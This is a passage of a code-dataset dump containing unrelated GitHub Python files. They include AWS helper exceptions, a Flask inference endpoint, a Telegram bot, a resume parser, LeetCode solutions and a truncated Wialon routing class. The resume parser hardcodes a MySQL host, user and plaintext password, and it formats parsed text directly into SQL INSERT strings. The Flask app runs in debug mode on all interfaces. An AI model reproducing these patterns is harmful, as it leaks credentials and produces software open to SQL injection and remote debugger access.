super(ResourceDoesNotExistException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ResourceClobberedException(Exception):\n \"\"\"Exception indicating that this AWS resource has been clobbered\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. 
ARN, VPC-ID) of the requested resource\n \"\"\"\n super(ResourceClobberedException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CannotDeleteResourceException(Exception):\n \"\"\"Exception indicating that an AWS resource cannot be deleted\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. ARN, VPC-ID) of the dependent resources\n \"\"\"\n super(CannotDeleteResourceException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CannotCreateResourceException(Exception):\n \"\"\"Exception indicating that an AWS resource cannot be created\"\"\"\n def __init__(self, message):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n \"\"\"\n super(CannotCreateResourceException, self).__init__(message)\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass RegionException(Exception):\n \"\"\"Exception indicating the current region is not this resource's region\"\"\"\n def __init__(self, resource_region):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n resource_region : string\n The resource region\n \"\"\"\n super(RegionException, self).__init__(\n \"This resource's region ({resource:s}) does not match the \"\n \"current region ({current:s})\".format(\n resource=resource_region, current=get_region()\n )\n )\n self.current_region = get_region()\n self.resource_region = resource_region\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ProfileException(Exception):\n \"\"\"Exception indicating the current profile isn't the resource's profile\"\"\"\n def __init__(self, resource_profile):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n resource_profile : string\n The resource profile\n \"\"\"\n super(ProfileException, self).__init__(\n \"This resource's profile ({resource:s}) does not match the \"\n \"current profile ({current:s})\".format(\n resource=resource_profile, current=get_profile()\n )\n )\n self.current_profile = get_profile()\n self.resource_profile = resource_profile\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CKTimeoutError(Exception):\n \"\"\"Cloudknot timeout error for AWS Batch job results\n\n Error indicating an AWS Batch job failed to return results within\n the requested time period\n \"\"\"\n def __init__(self, job_id):\n \"\"\"Initialize the Exception\"\"\"\n super(CKTimeoutError, self).__init__(\n 'The job with job-id {jid:s} did not finish within the '\n 'requested timeout period'.format(jid=job_id)\n )\n self.job_id = job_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass BatchJobFailedError(Exception):\n \"\"\"Error indicating an AWS Batch job failed\"\"\"\n def __init__(self, job_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n job_id : string\n The AWS jobId of the failed job\n \"\"\"\n super(BatchJobFailedError, self).__init__(\n \"AWS Batch job {job_id:s} has failed.\".format(job_id=job_id)\n )\n self.job_id = job_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CloudknotConfigurationError(Exception):\n \"\"\"Error indicating an cloudknot has not been properly 
configured\"\"\"\n def __init__(self, config_file):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n config_file : string\n The path to the cloudknot config file\n \"\"\"\n super(CloudknotConfigurationError, self).__init__(\n \"It looks like you haven't run `cloudknot configure` to set up \"\n \"your cloudknot environment. Or perhaps you did that but you have \"\n \"since deleted your cloudknot configuration file. Please run \"\n \"`cloudknot configure` before using cloudknot. \"\n )\n self.config_file = config_file\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CloudknotInputError(Exception):\n \"\"\"Error indicating an input argument has an invalid value\"\"\"\n def __init__(self, msg):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n msg : string\n The error message\n \"\"\"\n super(CloudknotInputError, self).__init__(msg)\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass NamedObject(object):\n \"\"\"Base class for building objects with name property\"\"\"\n def __init__(self, name):\n \"\"\"Initialize a base class with a name\n\n Parameters\n ----------\n name : string\n Name of the object. Must satisfy regular expression\n pattern: [a-zA-Z][-a-zA-Z0-9]*\n \"\"\"\n config_file = get_config_file()\n conf = configparser.ConfigParser()\n with rlock:\n conf.read(config_file)\n\n if not (conf.has_section('aws')\n and conf.has_option('aws', 'configured')\n and conf.get('aws', 'configured') == 'True'):\n raise CloudknotConfigurationError(config_file)\n\n name = str(name).replace('_', '-')\n pattern = re.compile('[a-zA-Z][-a-zA-Z0-9]*')\n if not pattern.match(name):\n raise CloudknotInputError('name must satisfy regular expression '\n 'pattern: [a-zA-Z][-a-zA-Z0-9]*')\n\n self._name = name\n self._clobbered = False\n self._region = get_region()\n self._profile = get_profile()\n\n @property\n def name(self):\n \"\"\"The name of this AWS resource\"\"\"\n return self._name\n\n @property\n def clobbered(self):\n \"\"\"Has this instance been previously clobbered\"\"\"\n return self._clobbered\n\n @property\n def region(self):\n \"\"\"The AWS region in which this resource was created\"\"\"\n return self._region\n\n @property\n def profile(self):\n \"\"\"The AWS profile in which this resource was created\"\"\"\n return self._profile\n\n def _get_section_name(self, resource_type):\n \"\"\"Return the config section name\n\n Append profile and region to the resource type name\n \"\"\"\n return ' '.join([resource_type, self.profile, self.region])\n\n def check_profile(self):\n \"\"\"Check for profile exception\"\"\"\n if self.profile != get_profile():\n raise ProfileException(resource_profile=self.profile)\n\n def check_profile_and_region(self):\n \"\"\"Check for region and profile exceptions\"\"\"\n if self.region != get_region():\n raise RegionException(resource_region=self.region)\n\n self.check_profile()\n","repo_name":"RonCard/cloudknot","sub_path":"cloudknot/aws/base_classes.py","file_name":"base_classes.py","file_ext":"py","file_size_in_byte":34830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"29098553831","text":"from flask import Flask\nfrom ml_service import infer\napp = Flask(__name__)\n\n@app.route('/')\ndef hello():\n\treturn \"This is a test message\"\n\n@app.route('/inference/')\ndef run_inference(image):\n\ttry:\n\t\tprint(\"image to be inferred is:\",image)\n\t\tprediction = infer(image)\n\t\treturn prediction\n\texcept OSError as 
ose:\n\t\treturn \"File Not Found: Please load image, \" + image + \", in images/ directory\"\n\texcept:\n\t\treturn \"Internal Server Error: Please contact ml-inference team 16\"\n\nif __name__ == \"__main__\":\n\tapp.run(host ='0.0.0.0', port = 5000, debug = True) ","repo_name":"parin1995/ML_Inference_Docker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30341584090","text":"import threading\nimport queue\nimport time\n\nclass WriterThread(threading.Thread):\n ''' writer thread writes out the commands in an infinite loop '''\n\n def __init__(self, exitcmd):\n threading.Thread.__init__(self)\n self._cmd_queue = queue.Queue()\n self._kill_received = False\n self.timeout = 0.1\n self.exitcmd = exitcmd\n\n def add_command(self, cmd):\n self._cmd_queue.put(cmd, False)\n\n def run(self):\n ''' just loop and write responses '''\n try:\n while True:\n try:\n try:\n cmd = self._cmd_queue.get(True, 0.1)\n except queue.Empty:\n if self._kill_received:\n return # break if queue is empty and _kill_received\n else:\n continue\n except Exception as e:\n # pydev_log.info('Finishing debug communication...(1)')\n # when liberating the thread here, we could have errors because we were shutting down\n # but the thread was still not liberated\n print(f\"Exception getting commands in writer queue: {e}\")\n return\n\n\n print(f\"Sending cmd {cmd}\")\n\n if cmd == self.exitcmd:\n print('WriterThread: CMD_EXIT received')\n break\n if time is None:\n break # interpreter shutdown\n time.sleep(self.timeout)\n finally:\n print('WriterThread: exit')\n\n def empty(self):\n return self._cmd_queue.empty()\n\n\nclass ReaderThread(threading.Thread):\n ''' reader thread reads and dispatches commands in an infinite loop '''\n\n def __init__(self, writer: WriterThread, rangeLimit: int):\n threading.Thread.__init__(self)\n self._buffer = b''\n self._writer = writer\n self.rangelimit = rangeLimit\n\n def run(self):\n for i in range(self.rangelimit):\n time.sleep(0.1)\n print(f\"Read command {i}\")\n self._writer.add_command(i)\n\n\n\n\n# Block until all tasks are done.\nw = WriterThread(99)\nr = ReaderThread(w, 100)\nw.start()\nr.start()\nw.join()\nr.join()\nprint('All work completed')","repo_name":"rchiodo/wasm_node_test","sub_path":"queue_example/queue_example.py","file_name":"queue_example.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34955845993","text":"import numpy as np\nimport math\nimport time\nimport sys\nimport pymysql as py\n\ndef Distance(a, b, xSize, ySize, Dfunc):\n output = np.zeros(xSize)\n for i in range(xSize):\n output[i]=Dfunc(a[i],b,ySize)\n return np.round(output,3)\n\n\ndef Euclidean(a, b, ySize):\n output=0\n for j in range(ySize):\n output+=(a[j]-b[j])**2\n return math.sqrt(output)\n\n\ndef Cosine(a,b,ySize):\n if np.linalg.norm(a) == 0 or np.linalg.norm(b) == 0:\n return 1\n return 1-np.dot(a,b)/np.linalg.norm(a)/np.linalg.norm(b)\n\n\ndef solve(tf_idf, tf_idf_this, totalNumofDoc, totalNumofWord, num):\n DE = Distance(tf_idf, tf_idf_this, totalNumofDoc, totalNumofWord, Euclidean)\n DC = Distance(tf_idf, tf_idf_this, totalNumofDoc, totalNumofWord, Cosine)\n\n out_DE = DE.argsort(kind='mergesort')[:num]\n out_DC = DC.argsort(kind='mergesort')[:num]\n\n #print(\"Euclidean: {} {} {}\".format(out_DE[0] + 1, out_DE[1] + 1, out_DE[2] + 1))\n 
#print(\"Cosine: {} {} {}\".format(out_DC[0] + 1, out_DC[1] + 1, out_DC[2] + 1))\n return [out_DE[:num], out_DC[:num],[DE[out_DE[0]],DE[out_DE[1]],DE[out_DE[2]]], [DC[[out_DC[0]]], DC[out_DC[1]], DC[out_DC[2]]]]\n\n\ndef findClosest(totalNumofNewDoc, file, num):\n tf_idf = np.load(\"../python/Parser/tf_idf.npy\")\n idf = np.load(\"../python/Parser/idf.npy\")\n dict = np.load(\"../python/Parser/dict.npy\").item()\n temp = np.load(\"../python/Parser/totalNum.npy\")\n linesData = []\n totalNumofDoc, totalNumofWord = temp[0], temp[1]\n w, h = totalNumofWord, totalNumofNewDoc\n output1 = [[0 for y in range(2)] for z in range(h)]\n output2 = [[0 for y in range(2)] for z in range(h)]\n\n tf = np.zeros((totalNumofNewDoc, totalNumofWord))\n index = 0\n\n for line in targetFile:\n numOfEmpty = 0\n emptyLine = 0\n\n while numOfEmpty < len(line):\n\n if line[numOfEmpty] == '\\n' or line[numOfEmpty] == '\\r':\n emptyLine = 1\n break\n\n elif line[numOfEmpty] == ' ':\n numOfEmpty += 1\n\n else:\n break\n\n if emptyLine == 1:\n continue\n\n line = line[numOfEmpty:]\n linesData += [line]\n translation_table = dict.fromkeys(map(ord, \",.:!?'\\\"\\n\"), None)\n line = line.translate(translation_table)\n line = line.lower()\n fields = line.split(' ')\n for words in fields:\n if words not in dict:\n continue\n tf[index][dict[words]] += 1\n tf[index] /= len(fields)\n index += 1\n\n for j in range(totalNumofNewDoc):\n for i in range(totalNumofWord):\n tf[j][i] *= idf[i]\n temp = solve(tf_idf, tf[j], totalNumofDoc, totalNumofWord, num)\n output1[j][0] = temp[0]\n output1[j][1] = temp[1]\n output2[j][0] = temp[2]\n output2[j][1] = temp[3]\n return output1, output2, linesData\n\n\ndef determineLabel(NumofSamples, file, num, minSupp):\n label = np.load(\"../python/parser/label.npy\")\n temp, dist, lines = findClosest(NumofSamples, file, num)\n returnLabels = [0 for i in range(NumofSamples)]\n confidence = [0 for i in range(NumofSamples)]\n\n for i in range(NumofSamples):\n count = dict()\n for j in range(num):\n label0 = label[temp[i][0][j]]\n label1 = label[temp[i][1][j]]\n if (dist[i][0][j] <= 1):\n if label0 not in count:\n count[label0] = 1*(1-dist[i][0][j])\n else:\n count[label0] += 1*(1-dist[i][0][j])\n\n if (dist[i][1][j] <= 1):\n if label1 not in count:\n count[label1] = 1*(1-dist[i][1][j])\n else:\n count[label1] += 1*(1-dist[i][1][j])\n result = sorted(count, key=count.get, reverse=True)\n if float(count[result[0]]) >= minSupp:\n returnLabels[i] = [lines[i], result[0]]\n confidence[i] = float(count[result[0]])\n return returnLabels, confidence\n\n\ndef assignRightThings(labels):\n result = dict()\n index = -1\n\n for i in labels:\n if i == 0:\n continue\n if i[1] == 'University':\n if 'University' not in result:\n result['University'] = i[0]\n\n if i[1] == 'Degree Type':\n if 'Major' not in result:\n result['Major'] = i[0]\n\n if i[1] == 'Minor':\n if 'Minor' not in result:\n result['Minor'] = i[0]\n\n if i[1] == 'Skill':\n if 'Skill' not in result:\n result['Skill'] = set()\n result['Skill'].add(i[0])\n\n if i[1] == 'Title':\n index += 1\n if 'Experience' not in result:\n result['Experience'] = []\n result['Experience'] += [dict()]\n\n result['Experience'][index]['Title'] = i[0]\n\n if i[1] == 'Date':\n if index< 0:\n continue\n else:\n if 'Date' not in result['Experience'][index]:\n result['Experience'][index]['Date'] = i[0]\n\n if i[1] == 'Location':\n if index< 0:\n continue\n else:\n if 'Location' not in result['Experience'][index]:\n result['Experience'][index]['Location'] = i[0]\n\n if i[1] == 
'Experience Description':\n if index< 0:\n continue\n else:\n if 'Description' not in result['Experience'][index]:\n result['Experience'][index]['Description'] = []\n result['Experience'][index]['Description'] += [i[0]]\n return result\n\ndef updateDb(final,uid):\n db = py.connect('webhost.engr.illinois.edu','jobhunter_whu14','Fuckuiuc12','jobhunter_db')\n\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM `user` WHERE `uid`=\"+str(uid))\n data = cursor.fetchall()\n school = data[0][6]\n major = data[0][8]\n secondMajor = data[0][9]\n minor = data[0][11]\n GPA = data[0][12]\n\n for i in final:\n #------User\n if i == 'University' and school == \"\":\n school = final[i]\n if i == 'Major':\n if major == \"\":\n major = final[i]\n if secondMajor == \"\":\n secondMajor = final[i]\n if i == 'Minor' and minor == \"\":\n minor = final[i]\n if i == 'GPA' and GPA == \"\":\n GPA = final[i]\n\n #------Experience\n if i == 'Experience':\n cursor.execute(\"SELECT MAX(uidExpNum) FROM Experience WHERE uid=\" + str(uid))\n data = cursor.fetchall()\n nextIndex = 1 if data[0][0] is None else data[0][0] + 1\n\n for j in final[i]:\n title = \"\"\n description = \"\"\n location = \"\"\n for k in j:\n if k == 'Title':\n title = j[k]\n if k == 'Location':\n location = j[k]\n if k == 'Description':\n for l in j[k]:\n description += l\n cursor.execute(\"INSERT INTO `Experience`(`Title`, `Location`, `Description`, `uidExpNum`, `uid`) VALUES ('{}','{}','{}','{}','{}')\".format(title,location,description,nextIndex,uid))\n nextIndex += 1\n\n #------Skill\n if i == 'Skill':\n cursor.execute(\"SELECT MAX(skillNum) FROM hasSkill WHERE uid=\" + str(uid))\n data = cursor.fetchall()\n nextIndex = 0 if data[0][0] is None else data[0][0]\n\n for j in final[i]:\n nextIndex += 1\n cursor.execute(\"INSERT INTO hasSkill(uid, SkillName, skillNum) VALUES ('{}','{}','{}')\".format(uid,j,nextIndex))\n\nuid = sys.argv[1]\ntargetFile = open(\"../python/\"+uid+\".txt\", 'r')\n\n# parameters CHANGE IT ACCORDINGLY!\nnum = 3\nminSupp = 0.5\nNumofSamples = 0\n\nfor line in targetFile:\n numOfEmpty = 0\n emptyLine = 0\n\n while numOfEmpty < len(line):\n\n if line[numOfEmpty] == '\\n' or line[numOfEmpty] =='\\r':\n emptyLine = 1\n break\n\n elif line[numOfEmpty] == ' ':\n numOfEmpty += 1\n\n else:\n break\n\n if emptyLine != 1:\n NumofSamples += 1\n\ntargetFile.seek(0)\nnewLabels, confidence = determineLabel(NumofSamples, targetFile, num, minSupp)\n\nfinal = assignRightThings(newLabels)\nprint(final)\nupdateDb(final,uid)\n\n\n\n","repo_name":"charlieyyy/internX","sub_path":"python/Parser/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":8424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7022105813","text":"# -*- coding: cp1251 -*-\nimport asyncio\nimport json\nimport logging\nfrom datetime import datetime\n\nimport schedule, time\nfrom aiogram.utils.markdown import hlink, hbold\n\nimport config\nfrom aiogram import Bot, Dispatcher, types, executor\nfrom aiogram.dispatcher.filters import Text\nfrom parser import parser_discounts_game\n\n# инициализируем бота\nbot = Bot(token=config.API_TOKEN, parse_mode=types.ParseMode.HTML)\n# Диспетчер для бота\ndp = Dispatcher(bot)\n# Включаем логирование, чтобы не пропустить важные сообщения\nlogging.basicConfig(level=logging.INFO)\n\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\n\nasync def setup_bot_commands(dp):\n bot_commands = [\n types.BotCommand(command=\"start\", 
description=\"Запустить бота\"),\n types.BotCommand(command=\"promo\", description=\"Список действующих и ближайших акций\"),\n types.BotCommand(command=\"shop\", description=\"Ссылка на магазин Epic Games\"),\n types.BotCommand(command=\"info\", description=\"Информация\"),\n types.BotCommand(command=\"help\", description=\"Отображает список всех доступных команд\")\n ]\n await bot.set_my_commands(bot_commands)\n\n\n@dp.message_handler(commands=\"help\")\nasync def help_info(message: types.Message):\n await message.answer(\n text='''\n Мои команды:\n /start - Запускает бота\n /promo - Список действующих и ближайших акций\n /shop - Ссылка на магазин Epic Games\n /info - Информация\n /help - Отображает список всех доступных команд\n '''\n )\n\n\n@dp.message_handler(commands=\"start\")\nasync def start_bot(message: types.Message):\n await message.answer('Привет {0.first_name} !\\nЯ - PaperGirl Aya!\\nЯ буду отправлять тебе уведомление о новый акциях в Epic Games :)'.format(message.from_user))\n\n@dp.message_handler(commands=[\"promo\"])\nasync def get_discount_Game(message: types.Message):\n await message.answer(\"Пожалуйста подождите...\")\n\n parser_discounts_game()\n\n with open(\"new_json.json\") as file:\n data = json.load(file)\n\n for item in data:\n card = f\"{hlink(item.get('url'), item.get('url'))}\\n\" \\\n f\"{hbold('Заголовок: ')} {item.get('title')}\\n\" \\\n f\"{hbold('Описание: ')} {item.get('description')}\\n\" \\\n f\"{hbold('Цена: ')} {item.get('price')}\\n\" \\\n f\"{hbold('Цена со скидкой: ')} {item.get('discountPrice')}\\n\" \\\n f\"{hbold('Дата начала акции: ')} {item.get('startDate')}\\n\" \\\n f\"{hbold('Дата конца акции: ')} {item.get('endDate')}\\n\" \\\n\n await message.answer(card)\n\n\n@dp.message_handler(commands=[\"shop\"])\nasync def ShopEG(message: types.Message):\n await bot.send_message(message.from_user.id, \"Ваша ссылка на магазин Epic games \" + str('epicgames.com/'))\n\n\n@dp.message_handler(commands=[\"info\"])\nasync def Info(message: types.Message):\n cardInfo = f\"{hbold('Разработчики: ')} : Исрафилов Сабухи, Силинский Антон, Паргачёв Алексей\\n\" \\\n f\"{hbold('Наш сайт: ')} : Здесь будет ссылка на сайт если Тоха развернет на сервак :)\\n\" \\\n f\"{hbold('Дискорд бот: ')} : {hlink('PaperGirl Aya', '')}\" \\\n\n await bot.send_message(message.from_user.id, cardInfo)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, on_startup=setup_bot_commands)\n\n","repo_name":"IsSabuhi/PaperGirl-Python-TelegramBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6844600783","text":"import pygments.styles\nfrom pygments.token import string_to_tokentype\nfrom pygments.util import ClassNotFound\n\nfrom prompt_toolkit.styles import default_style_extensions, style_from_dict\n\n\ndef style_factory(name, cli_style):\n \"\"\"Get a named style for the CLI.\n\n Paramters\n ---------\n name: `str`\n Name of style class.\n cli_style: `dict`\n \n Returns\n -------\n pymgents.style.BaseStyle\n \"\"\"\n try:\n style = pygments.styles.get_style_by_name(name)\n except ClassNotFound:\n style = pygments.styles.get_style_by_name('native')\n\n styles = {}\n styles.update(style.styles)\n styles.update(default_style_extensions)\n custom_styles = {string_to_tokentype(x): y for x, y in cli_style.items()}\n styles.update(custom_styles)\n\n return 
style_from_dict(styles)\n\n","repo_name":"man-group/okcli","sub_path":"okcli/clistyle.py","file_name":"clistyle.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"32"} +{"seq_id":"38708753683","text":"'''\nGiven the root of a binary tree, the level of its root is 1, the level of its children is 2, and so on.\n\nReturn the smallest level x such that the sum of all the values of nodes at level x is maximal.\n\n \n\nExample 1:\n\n\nInput: root = [1,7,0,7,-8,null,null]\nOutput: 2\nExplanation: \nLevel 1 sum = 1.\nLevel 2 sum = 7 + 0 = 7.\nLevel 3 sum = 7 + -8 = -1.\nSo we return the level with the maximum sum which is level 2.\nExample 2:\n\nInput: root = [989,null,10250,98693,-89388,null,null,null,-32127]\nOutput: 2\n \n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 104].\n-105 <= Node.val <= 105\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n \n if not root:\n return root\n \n queue = [root]\n summ = float('-inf')\n max_summ = float('-inf')\n max_level = 0\n l = 0\n while queue:\n summ = 0\n layer = []\n l += 1\n \n for i in range(len(queue)):\n Node = queue.pop(0)\n layer.append(Node)\n summ += Node.val\n if Node.left:\n queue.append(Node.left)\n if Node.right:\n queue.append(Node.right)\n \n if summ > max_summ:\n max_summ = summ\n max_level = l\n \n \n return max_level\n \n ","repo_name":"rabi-siddique/LeetCode","sub_path":"Trees/MaximumLevelSum.py","file_name":"MaximumLevelSum.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16678277764","text":"from django import forms\n\nfrom .models import Category, TransactionRecord\n\nclass UserImportForm(forms.Form):\n file = forms.FileField(\n widget=forms.FileInput(attrs={'accept': 'text/csv'})\n )\n\nclass BookSearchForm(forms.Form):\n category = forms.ModelChoiceField(queryset=Category.objects.all(), required=False)\n word = forms.CharField(required=False, widget=forms.TextInput(attrs={'type': 'search'}))\n\nclass CoinChargeForm(forms.ModelForm):\n class Meta:\n model = TransactionRecord\n fields = ['amount', 'user']\n widgets = {\n 'user': forms.HiddenInput\n }\n\nclass CoinUseForm(forms.ModelForm):\n class Meta:\n model = TransactionRecord\n fields = {'user', 'book'}\n widgets = {\n 'user': forms.HiddenInput,\n 'book': forms.HiddenInput\n }","repo_name":"komisal/django_win","sub_path":"onboro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34750620433","text":"import numpy as np\nfrom collections import deque, defaultdict\ndef isBipartite(graph) -> bool:\n n = len(graph)\n color = np.zeros(n, int)\n for i in range(n):\n if(color[i] == 0):\n queue = deque()\n queue.append(i)\n color[i] = 1\n while(queue):\n curr = queue.popleft()\n for j in graph[curr]:\n if(color[curr] == color[j]):\n return False\n if(color[j] == 0):\n color[j]= -color[curr]\n queue.append(j)\n return True\n\n\nif __name__ == '__main__':\n print(isBipartite([[1,2,3],[0,2],[0,1,3],[0,2]]))\n 
print(isBipartite([[1,3],[0,2],[1,3],[0,2]]))","repo_name":"anki08/Leetcode-Solutions","sub_path":"Graph/BFS/isBipartite.py","file_name":"isBipartite.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34359884391","text":"import datetime\nimport logging\nimport os\nimport sys\nimport time\nimport traceback\n\nimport requests\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom wialon import Wialon, WialonError\n\nlog = logging.getLogger(os.path.basename(__file__))\n\ncomands_types = {\n \"/start\": \"Процедура авторизации\",\n \"/help\": \"Описание комант бота\",\n \"/add_orders\": \"Добавить заявку в созданый маршрут\",\n \"/start_route\": \"Создать новый маршрут\",\n \"/send_location\": \"Отправить координаты\",\n \"/i_am_here\": \"Добавить метку по прибытию к клиенту. Создаеться новая заявка\"\n\n}\n\n\nclass States(StatesGroup):\n STATE_GET_COMMAND = State()\n STATE_GET_TAG = State()\n STATE_GET_ORDERS = State()\n STATE_INITIAL_WAREHOUSE = State()\n STATE_FINAL_WAREHOUSE = State()\n STATE_CREATE_ROUTS = State()\n\n STATE_GET_NUMBER = State()\n\n STATE_INITIAL_ADD_ORDERS = State()\n STATE_GET_TAG_ADD_ORDERS = State()\n STARE_GET_ORDERS_ADD_ORDERS = State()\n STATE_FINAL_ADD_ORDERS = State()\n\n\ndef exp_calc(order: list, time_value: str, ceratain=True):\n '''\n Функция для расчета времени до автозавершения маршрута.\n Нужно подставлять в параметр \"exp\" присоздании/редактировании маршрута\n :param order: список заявок\n :param time: строка в виде \"hh:mm\"\n :param ceratain: если True, то возвращаеться время от последней заявки до значения time.\n Если False, то возвращаеться значение time в секундах\n :return: Количество секунд.\n '''\n data = time.strptime(time_value, \"%H:%M\")\n data = datetime.timedelta(hours=data.tm_hour, minutes=data.tm_min).seconds\n if ceratain is True:\n max_vt = 0\n for el in order:\n max_vt = max(max_vt, el['p']['r']['vt'])\n exp = int(time.time())\n exp -= exp % 86400\n exp += data\n if max_vt < exp:\n return exp - max_vt\n else:\n return max_vt\n else:\n return data\n\n\ndef create_order(**kwargs) -> dict:\n time_now = int(time.time())\n params = {\n 'id': 0,\n 'tf': time_now - (time_now % 86400),\n 'tt': time_now - (time_now % 86400) + 86400,\n 'r': 100,\n 'trt': 3600\n }\n for key, value in kwargs.items():\n if key == 'n':\n params['n'] = value\n params['p'] = {'n': value}\n elif key == 'a':\n params['p']['a'] = value\n elif key == 'p':\n params['p']['p'] = value\n elif key == 'y':\n params['y'] = value\n elif key == 'x':\n params['x'] = value\n elif key == 'f':\n params['f'] = value\n elif key == 'tf':\n params['tf'] = value\n elif key == 'tt':\n params['tt'] = value\n elif key == 'tft':\n params['tft'] = value\n elif key == 'callMode': params['callMode'] = value\n\n return params\n\n\nclass Orders(Wialon):\n driver_data = dict()\n orders_for_route = dict()\n warehouses_for_route = dict()\n orders_list = dict()\n raw_data = None\n data_by_tags = None\n warehouse = dict()\n orders = None\n user_id = None\n user_name = None\n itemIds = None\n token = None\n save_time = int(time.time())\n\n def __init__(self, wialon_object, token, **extra_params):\n super().__init__(**extra_params)\n self.wialon_object = wialon_object\n self.token = token\n self.itemIds = self.get_resource_for_orders()\n\n def get_orders(self):\n try:\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"propitemname\",\n \"propName\": \"orders\",\n 
\"propValueMask\": \"*\",\n \"sortType\": \"orders\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 524288,\n \"from\": 0,\n \"to\": 0\n }\n orders = self.wialon_object.call('core_search_items', params)\n self.orders = orders['items']\n except Exception as e:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"propitemname\",\n \"propName\": \"orders\",\n \"propValueMask\": \"*\",\n \"sortType\": \"orders\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 524288,\n \"from\": 0,\n \"to\": 0\n }\n orders = self.wialon_object.call('core_search_items', params)\n self.orders = orders['items']\n finally:\n tags_key = dict(No_tags='')\n for el in self.orders:\n orders = el['orders']\n for name in orders.values():\n\n if name['f'] == 32 and name['p']['r'] is None:\n\n try:\n if name['p']['tags'] == [] or type(name['p']['tags']) == str:\n tags_value = tags_key.get('No_tags')\n tags_value = dict(tags_value)\n tags_value.update({name['id']: name})\n tags_key['No_tags'] = tags_value\n self.orders_list.update({name['id']: name})\n else:\n for tags in name['p']['tags']:\n if tags_key.get(tags) is None:\n tags_key.update({tags: ''})\n tags_key[tags] = {name['id']: name}\n self.orders_list.update({name['id']: name})\n else:\n tags_value = tags_key.get(tags)\n tags_value.update({name['id']: name})\n tags_key[tags] = tags_value\n self.orders_list.update({name['id']: name})\n except:\n print(name)\n tags_value = tags_key.get('No_tags')\n tags_value = dict(tags_value)\n tags_value.update({name['id']: name})\n tags_key['No_tags'] = tags_value\n self.orders_list.update({name['id']: name})\n elif name['f'] & 4 and name['p']['r'] is None:\n self.warehouse.update({name['id']: name})\n\n self.data_by_tags = tags_key\n return self.orders\n\n def craete_route(self, orders_id: list, warehouses: list, driver: int):\n gis = {\n \"provider\": 1, # 0-нет, 1-gurtam, 2-google\n \"addPoints\": 1, # 0-не возвращать трек, 1-вернуть трек\n \"speed\": 50 # скорость для оптимизации\n }\n params = {\n \"itemId\": self.itemIds,\n \"orders\": orders_id,\n \"units\": [driver],\n \"warehouses\": warehouses,\n \"criterions\": {},\n \"flags\": 131,\n \"gis\": gis\n }\n try:\n response = self.wialon_object.call('order_optimize', params)\n\n except WialonError as e:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n response = self.wialon_object.call('order_optimize', params)\n self.get_orders()\n route_id = int(time.time())\n order_list = list()\n order_warehouse = orders_id\n order_warehouse.extend(warehouses)\n try:\n for keys, data in response.items():\n if keys == 'details':\n pass\n elif keys == 'success':\n pass\n elif keys == 'summary':\n pass\n else:\n i = 0\n # записываем данные о посещении первой точки. 
